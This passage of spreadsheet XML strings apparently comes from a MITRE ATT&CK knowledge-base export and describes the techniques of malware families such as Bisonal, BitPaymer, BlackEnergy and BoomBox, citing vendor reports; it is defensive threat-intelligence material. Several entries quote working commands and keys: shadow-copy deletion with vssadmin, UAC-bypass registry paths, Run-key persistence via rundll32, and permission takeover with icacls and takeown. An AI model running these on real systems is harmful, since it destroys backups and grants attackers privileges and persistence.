    <t>[BendyBear](https://attack.mitre.org/software/S0574) is designed to download an implant from a C2 server.(Citation: Unit42 BendyBear Feb 2021)</t>
  </si>
  <si>
    <t>[BendyBear](https://attack.mitre.org/software/S0574) has used byte randomization to obscure its behavior.(Citation: Unit42 BendyBear Feb 2021)</t>
  </si>
  <si>
    <t>[BendyBear](https://attack.mitre.org/software/S0574) can load and execute modules and Windows Application Programming (API) calls using standard shellcode API hashing.(Citation: Unit42 BendyBear Feb 2021)</t>
  </si>
  <si>
    <t>[BendyBear](https://attack.mitre.org/software/S0574) has used a custom RC4 and XOR encrypted protocol over port 443 for C2.(Citation: Unit42 BendyBear Feb 2021)</t>
  </si>
  <si>
    <t>[BendyBear](https://attack.mitre.org/software/S0574) has encrypted payloads using RC4 and XOR.(Citation: Unit42 BendyBear Feb 2021)</t>
  </si>
  <si>
    <t>[BendyBear](https://attack.mitre.org/software/S0574) can query the host's Registry key at &lt;code&gt;HKEY_CURRENT_USER\Console\QuickEdit&lt;/code&gt; to retrieve data.(Citation: Unit42 BendyBear Feb 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[BendyBear](https://attack.mitre.org/software/S0574) communicates to a C2 server over port 443 using modified RC4 and XOR-encrypted chunks.(Citation: Unit42 BendyBear Feb 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[BendyBear](https://attack.mitre.org/software/S0574) has the ability to determine local time on a compromised host.(Citation: Unit42 BendyBear Feb 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[BendyBear](https://attack.mitre.org/software/S0574) can check for analysis environments and signs of debugging using the Windows API &lt;code&gt;kernel32!GetTickCountKernel32&lt;/code&gt; call.(Citation: Unit42 BendyBear Feb 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268) has been loaded through a `.wll` extension added to the ` %APPDATA%\microsoft\word\startup\` repository.(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268) has appended random binary data to the end of itself to generate a large binary.(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268) has collected information from a compromised host.(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268) has decoded strings in the malware using XOR and RC4.(Citation: Unit 42 Bisonal July 2018)(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) has used a dynamic DNS service for C2.(Citation: Talos Bisonal Mar 2020)</t>
  </si>
  <si>
    <t xml:space="preserve"> [Bisonal](https://attack.mitre.org/software/S0268) has added the exfiltrated data to the URL over the C2 channel.(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) will delete its dropper and VBS scripts from the victim’s machine.(Citation: Unit 42 Bisonal July 2018)(Citation: Kaspersky CactusPete Aug 2020)(Citation: Talos Bisonal Mar 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268) can retrieve a file listing from the system.(Citation: Kaspersky CactusPete Aug 2020)(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268) has the capability to download files to execute on the victim’s machine.(Citation: Unit 42 Bisonal July 2018)(Citation: Kaspersky CactusPete Aug 2020)(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268) has relied on users to execute malicious file attachments delivered via spearphishing emails.(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve"> [Bisonal](https://attack.mitre.org/software/S0268) dropped a decoy payload with a .jpg extension that contained a malicious Visual Basic script.(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268) has renamed malicious code to `msacm32.dll` to hide within a legitimate library; earlier versions were disguised as `winhelp`.(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268) has deleted Registry keys to clean up its prior activity.(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) has used the Windows API to communicate with the Service Control Manager to execute a thread.(Citation: Talos Bisonal Mar 2020)</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) has used raw sockets for network communication.(Citation: Talos Bisonal Mar 2020)</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268)'s DLL file and non-malicious decoy file are encrypted with RC4 and some function name strings are obfuscated.(Citation: Unit 42 Bisonal July 2018)(Citation: Talos Bisonal Mar 2020)</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) can obtain a list of running processes on the victim’s machine.(Citation: Unit 42 Bisonal July 2018)(Citation: Kaspersky CactusPete Aug 2020)(Citation: Talos Bisonal Mar 2020)</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) has supported use of a proxy server.(Citation: Talos Bisonal Mar 2020)</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) has used the RegQueryValueExA function to retrieve proxy information in the Registry.(Citation: Talos Bisonal Mar 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268) has added itself to the Registry key &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Run\&lt;/code&gt; for persistence.(Citation: Unit 42 Bisonal July 2018)(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) has used rundll32.exe to execute as part of the Registry Run key it adds: &lt;code&gt;HKEY_CURRENT_USER \Software\Microsoft\Windows\CurrentVersion\Run\”vert” = “rundll32.exe c:\windows\temp\pvcu.dll , Qszdez”&lt;/code&gt;.(Citation: Unit 42 Bisonal July 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268) has used the MPRESS packer and similar tools for obfuscation.(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268) has been delivered as malicious email attachments.(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268) has encoded binary data with Base64 and ASCII.(Citation: Kaspersky CactusPete Aug 2020)(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268) variants reported on in 2014 and 2015 used a simple XOR cipher for C2. Some [Bisonal](https://attack.mitre.org/software/S0268) samples encrypt C2 communications with RC4.(Citation: Unit 42 Bisonal July 2018)(Citation: Kaspersky CactusPete Aug 2020)(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) has used commands and API calls to gather system information.(Citation: Unit 42 Bisonal July 2018)(Citation: Kaspersky CactusPete Aug 2020)(Citation: Talos Bisonal Mar 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268) can execute &lt;code&gt;ipconfig&lt;/code&gt; on the victim’s machine.(Citation: Unit 42 Bisonal July 2018)(Citation: Kaspersky CactusPete Aug 2020)(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) can check the system time set on the infected host.(Citation: Kaspersky CactusPete Aug 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268) has checked if the malware is running in a virtual environment with the anti-debug function GetTickCount() to compare the timing.(Citation: Kaspersky CactusPete Aug 2020)(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) can check to determine if the compromised system is running on VMware.(Citation: Talos Bisonal Mar 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268)'s dropper creates VBS scripts on the victim’s machine.(Citation: Unit 42 Bisonal July 2018)(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) has used HTTP for C2 communications.(Citation: Unit 42 Bisonal July 2018)(Citation: Kaspersky CactusPete Aug 2020)</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) has launched cmd.exe and used the ShellExecuteW() API function to execute commands on the system.(Citation: Unit 42 Bisonal July 2018)(Citation: Kaspersky CactusPete Aug 2020)(Citation: Talos Bisonal Mar 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Bisonal](https://attack.mitre.org/software/S0268) has been modified to be used as a Windows service.(Citation: Talos Bisonal Mar 2020) </t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can suppress UAC prompts by setting the &lt;code&gt;HKCU\Software\Classes\ms-settings\shell\open\command&lt;/code&gt; registry key on Windows 10 or &lt;code&gt;HKCU\Software\Classes\mscfile\shell\open\command&lt;/code&gt; on Windows 7 and launching the &lt;code&gt;eventvwr.msc&lt;/code&gt; process, which launches [BitPaymer](https://attack.mitre.org/software/S0570) with elevated privileges.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can import a hard-coded RSA 1024-bit public key, generate a 128-bit RC4 key for each file, and encrypt the file in place, appending &lt;code&gt;.locked&lt;/code&gt; to the filename.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) compares file names and paths to a list of excluded names and directory names during encryption.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) attempts to remove the backup shadow files from the host using &lt;code&gt;vssadmin.exe Delete Shadows /All /Quiet&lt;/code&gt;.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can enumerate the sessions for each user logged onto the infected host.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[BitPaymer](https://attack.mitre.org/software/S0570) can set values in the Registry to help in execution.(Citation: Crowdstrike Indrik November 2018) </t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) has copied itself to the &lt;code&gt;:bin&lt;/code&gt; alternate data stream of a newly created file.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) has used dynamic API resolution to avoid identifiable strings within the binary, including &lt;code&gt;RegEnumKeyW&lt;/code&gt;.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can search for network shares on the domain or workgroup using &lt;code&gt;net view &lt;host&gt;&lt;/code&gt;.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) has used RC4-encrypted strings and string hashes to avoid identifiable strings within the binary.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[BitPaymer](https://attack.mitre.org/software/S0570) can use the RegEnumKeyW to iterate through Registry keys.(Citation: Crowdstrike Indrik November 2018) </t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) has set the run key &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; for persistence.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can use &lt;code&gt;net view&lt;/code&gt; to discover remote systems.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can enumerate existing Windows services on the host that are configured to run as LocalSystem.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can modify the timestamp of an executable so that it can be identified and restored by the decryption tool.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can use the tokens of users to create processes on infected systems.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can use &lt;code&gt;icacls /reset&lt;/code&gt; and &lt;code&gt;takeown /F&lt;/code&gt; to reset a targeted executable's permissions and then take ownership.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) has attempted to install itself as a service to maintain persistence.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) attempts to bypass default User Access Control (UAC) settings by exploiting a backward-compatibility setting found in Windows 7 and later.(Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>The [BlackEnergy](https://attack.mitre.org/software/S0089) component KillDisk is capable of deleting Windows Event Logs.(Citation: ESEST Black Energy Jan 2016)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has enabled the &lt;code&gt;TESTSIGNING&lt;/code&gt; boot configuration option to facilitate loading of a driver component.(Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has used a plug-in to gather credentials stored in files on the host by various software programs, including The Bat! email client, Outlook, and Windows Credential Store.(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has used a plug-in to gather credentials from web browsers including FireFox, Google Chrome, and Internet Explorer.(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) 2 contains a "Destroy" plug-in that destroys data stored on victim hard drives by overwriting file contents.(Citation: Securelist BlackEnergy Feb 2015)(Citation: ESET BlackEnergy Jan 2016)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) injects its DLL component into svchost.exe.(Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has the capability to communicate over a backup channel via plus.google.com.(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) gathers a list of installed apps from the uninstall program Registry. It also gathers registered mail, browser, and instant messaging clients from the Registry. [BlackEnergy](https://attack.mitre.org/software/S0089) has searched for given file types.(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has removed the watermark associated with enabling the &lt;code&gt;TESTSIGNING&lt;/code&gt; boot configuration option by removing the relevant strings in the &lt;code&gt;user32.dll.mui&lt;/code&gt; of the system.(Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has run a keylogger plug-in on a victim.(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has conducted port scans on a host.(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) can gather very specific information about attached USB devices, to include device instance ID and drive geometry.(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has gathered a process list by using [Tasklist](https://attack.mitre.org/software/S0057).exe.(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)(Citation: ESET BlackEnergy Jan 2016)</t>
  </si>
  <si>
    <t>The [BlackEnergy](https://attack.mitre.org/software/S0089) 3 variant drops its main DLL component and then creates a .lnk shortcut to that file in the startup folder.(Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has run a plug-in on a victim to spread through the local network by using [PsExec](https://attack.mitre.org/software/S0029) and accessing admin shares.(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) is capable of taking screenshots.(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>One variant of [BlackEnergy](https://attack.mitre.org/software/S0089) locates existing driver services that have been disabled and drops its driver component into one of those service's paths, replacing the legitimate executable. The malware then sets the hijacked service to start automatically to establish persistence.(Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has used [Systeminfo](https://attack.mitre.org/software/S0096) to gather the OS version, as well as information on the system configuration, BIOS, the motherboard, and the processor.(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has gathered information about network IP configurations using [ipconfig](https://attack.mitre.org/software/S0100).exe and about routing tables using [route](https://attack.mitre.org/software/S0103).exe.(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has gathered information about local network connections using [netstat](https://attack.mitre.org/software/S0104).(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) communicates with its C2 server over HTTP.(Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>A [BlackEnergy](https://attack.mitre.org/software/S0089) 2 plug-in uses WMI to gather victim host details.(Citation: Securelist BlackEnergy Feb 2015)</t>
  </si>
  <si>
    <t>One variant of [BlackEnergy](https://attack.mitre.org/software/S0089) creates a new service using either a hard-coded or randomly generated name.(Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>[BlackMould](https://attack.mitre.org/software/S0564) can copy files on a compromised host.(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>[BlackMould](https://attack.mitre.org/software/S0564) has the ability to find files on the targeted system.(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>[BlackMould](https://attack.mitre.org/software/S0564) has the ability to download files to the victim's machine.(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>[BlackMould](https://attack.mitre.org/software/S0564) can enumerate local drives on a compromised host.(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>[BlackMould](https://attack.mitre.org/software/S0564) can send commands to C2 in the body of HTTP POST requests.(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>[BlackMould](https://attack.mitre.org/software/S0564) can run cmd.exe with parameters.(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can compress data collected by its SharpHound ingestor into a ZIP file to be written to disk.(Citation: GitHub Bloodhound)</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can collect information about domain users, including identification of domain admin accounts.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can collect information about domain groups and members.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) has the ability to map domain trusts and identify misconfigurations for potential abuse.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) has the ability to collect local admin information via GPO.(Citation: GitHub Bloodhound)</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can identify users with local administrator rights.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can collect information about local groups and members.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can use .NET API calls in the SharpHound ingestor component to pull Active Directory data.(Citation: GitHub Bloodhound)</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can collect password policy information on the target environment.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can use PowerShell to pull Active Directory information from the target environment.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can enumerate and collect the properties of domain computers, including domain controllers.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can collect information on user sessions.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Bonadan](https://attack.mitre.org/software/S0486) can create bind and reverse shells on the infected system.(Citation: ESET ForSSHe December 2018)	</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) has maliciously altered the OpenSSH binary on targeted systems to create a backdoor.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) can download additional modules from the C2 server.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) can use the &lt;code&gt;ps&lt;/code&gt; command to discover other cryptocurrency miners active on the system.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) can download an additional module which has a cryptocurrency mining extension.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) can XOR-encrypt C2 communications.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) has discovered the OS version, CPU model, and RAM size of the system it has been installed on.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) can find the external IP address of the infected host.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) has discovered the username of the user running the backdoor.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[BoomBox](https://attack.mitre.org/software/S0635) can decrypt AES-encrypted files downloaded from C2.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[BoomBox](https://attack.mitre.org/software/S0635) has the ability to execute an LDAP query to enumerate the distinguished name, SAM account name, and display name for all domain users.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[BoomBox](https://attack.mitre.org/software/S0635) can execute an LDAP query to discover e-mail accounts for domain users.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[BoomBox](https://attack.mitre.org/software/S0635) can check its current working directory and for the presence of a specific file and terminate if specific values are not found.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[BoomBox](https://attack.mitre.org/software/S0635) can upload data to dedicated per-victim folders in Dropbox.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[BoomBox](https://attack.mitre.org/software/S0635) can search for specific files and directories on a machine.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[BoomBox](https://attack.mitre.org/software/S0635) has the ability to download next stage malware components to a compromised system.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[BoomBox](https://attack.mitre.org/software/S0635) has gained execution through user interaction with a malicious file.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[BoomBox](https://attack.mitre.org/software/S0635) has the ability to mask malicious data strings as PDF files.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[BoomBox](https://attack.mitre.org/software/S0635) can encrypt data using AES prior to exfiltration.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[BoomBox](https://attack.mitre.org/software/S0635) can establish persistence by writing the Registry value &lt;code&gt;MicroNativeCacheSvc&lt;/code&gt; to &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[BoomBox](https://attack.mitre.org/software/S0635) can use RunDLL32 for execution.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[BoomBox](https://attack.mitre.org/software/S0635) can enumerate the hostname, domain, and IP of a compromised host.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[BoomBox](https://attack.mitre.org/software/S0635) can enumerate the username on a compromised host.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[BoomBox](https://attack.mitre.org/software/S0635) has used HTTP POST requests for C2.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[BoomBox](https://attack.mitre.org/software/S0635) can download files from Dropbox using a hardcoded access token.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[BoxCaon](https://attack.mitre.org/software/S0651) has used DropBox for C2 communications.(Citation: Checkpoint IndigoZebra July 2021) </t>
  </si>
  <si>
    <t>[BoxCaon](https://attack.mitre.org/software/S0651) established persistence by setting the &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load&lt;/code&gt; registry key to point to its executable.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>[BoxCaon](https://attack.mitre.org/software/S0651) can upload files from a compromised host.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>[BoxCaon](https://attack.mitre.org/software/S0651) uploads files and data from a compromised host over the existing C2 channel.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>[BoxCaon](https://attack.mitre.org/software/S0651) has the capability to download folders' contents on the system and upload the results back to its Dropbox drive.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>[BoxCaon](https://attack.mitre.org/software/S0651) has searched for files on the system, such as documents located in the desktop folder.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>[BoxCaon](https://attack.mitre.org/software/S0651) can download files.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[BoxCaon](https://attack.mitre.org/software/S0651) has created a working folder for collected files that it sends to the C2 server.(Citation: Checkpoint IndigoZebra July 2021) </t>
  </si>
  <si>
    <t>[BoxCaon](https://attack.mitre.org/software/S0651) has used Windows API calls to obtain information about the compromised host.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>[BoxCaon](https://attack.mitre.org/software/S0651) used the "StackStrings" obfuscation technique to hide malicious functionalities.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>[BoxCaon](https://attack.mitre.org/software/S0651) can collect the victim's MAC address by using the &lt;code&gt;GetAdaptersInfo&lt;/code&gt; API.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>[BoxCaon](https://attack.mitre.org/software/S0651) can execute arbitrary commands and utilize the "ComSpec" environment variable.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>[Brave Prince](https://attack.mitre.org/software/S0252) terminates antimalware processes.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>Some [Brave Prince](https://attack.mitre.org/software/S0252) variants have used South  Korea's Daum email service to exfiltrate information, and later variants have posted the data to a web server via an HTTP post command.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Brave Prince](https://attack.mitre.org/software/S0252) gathers file and directory information from the victim’s machine.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Brave Prince](https://attack.mitre.org/software/S0252) lists the running processes.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Brave Prince](https://attack.mitre.org/software/S0252) gathers information about the Registry.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Brave Prince](https://attack.mitre.org/software/S0252) collects hard drive content and system configuration information.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Brave Prince](https://attack.mitre.org/software/S0252) gathers network configuration information as well as the ARP cache.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Briba](https://attack.mitre.org/software/S0204) downloads files onto infected hosts.(Citation: Symantec Briba May 2012)</t>
  </si>
  <si>
    <t>[Briba](https://attack.mitre.org/software/S0204) creates run key Registry entries pointing to malicious DLLs dropped to disk.(Citation: Symantec Briba May 2012)</t>
  </si>
  <si>
    <t>[Briba](https://attack.mitre.org/software/S0204) uses rundll32 within [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001) entries to execute malicious DLLs.(Citation: Symantec Briba May 2012)</t>
  </si>
  <si>
    <t>[Briba](https://attack.mitre.org/software/S0204) installs a service pointing to a malicious DLL dropped to disk.(Citation: Symantec Briba May 2012)</t>
  </si>
  <si>
